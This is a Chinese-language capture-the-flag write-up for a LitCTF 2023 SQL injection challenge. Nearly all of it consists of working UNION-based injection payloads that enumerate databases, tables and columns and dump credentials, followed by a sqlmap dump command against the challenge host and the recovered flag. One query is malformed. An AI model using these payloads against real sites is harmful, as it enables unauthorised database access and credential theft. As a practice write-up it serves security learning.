526互联

[LitCTF 2023]这是什么?SQL !注一下 !

发布时间 2023-05-26 21:42:37作者: Ekusas

做题过程

代码中给出了username和password两列,所以我们就可以不用使用order by 语句

查询所有的库

给出的sql语句可以看出闭合方式是(((((()))))),所以语句为

?id=-1)))))) union select schema_name,2 from information_schema.schemata%23


Array ( [0] => Array ( [username] => information_schema [password] => 2 )
 [1] => Array ( [username] => mysql [password] => 2 ) 
 [2] => Array ( [username] => ctftraining [password] => 2 )
 [3] => Array ( [username] => performance_schema [password] => 2 )
 [4] => Array ( [username] => test [password] => 2 )
 [5] => Array ( [username] => ctf [password] => 2 ) )

 

查询ctf库

?id=-1)))))) union select database(),2%23
Array ( [0] => Array ( [username] => ctf [password] => 2 ) )


?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctf'%23
//users


?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='ctf'%23
// id,username,password


?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password),2 from users%23
//1~tanji~OHHHHHHH,2~fake_flag~F1rst_to_Th3_eggggggggg!}
//假的flag

查询ctfraing库

?id=-1)))))) union select group_concat(table_name),2 from information_schema.tables where table_schema='ctftraining'%23
Array ( [0] => Array ( [username] => flag,news,users [password] => 2 ) )
// flag,news,users 


?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='flag' and ='ctftraining'%23
Array ( [0] => Array ( [username] => flag [password] => 2 ) )
//flag 


?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='news' and table_schema='ctftraining'%23
//id,title,content,time


?id=-1)))))) union select group_concat(column_name),2 from information_schema.columns where table_name='users' and table_schema='ctftraining'%23
//id,username,password,ip,time


?id=-1)))))) union select group_concat(id,0x7e,title,0x7e,content,0x7e,time),2 from news where table_schema='ctftraining'%23
//0 results


?id=-1)))))) union select group_concat(id,0x7e,username,0x7e,password,0x7e,ip),2 from users where table_schema='ctftraining'%23
//0 results


?id=-1)))))) union select flag,2 from flag where table_schema='ctftraining'%23
//0 results


怎么会是空的呢????
可能是语句的问题,我们使用Sqlmap直接跑:
sqlmap -u http://node5.anna.nssctf.cn:28051/index.php?id=1 -D "ctftraining" -T flag -C flag --dump
//NSSCTF{4cae7b33-2369-4fc6-8d2f-96703f010fd5}

经过测试,发现了table_schema只是内置库的字段,我们这里指定数据库查询应该用:库名.表名的形式
?id=-1)))))) union select flag,2 from ctftraining.flag%23
// NSSCTF{4cae7b33-2369-4fc6-8d2f-96703f010fd5}

参考了NSSCTF平台上clqwsn师傅的wp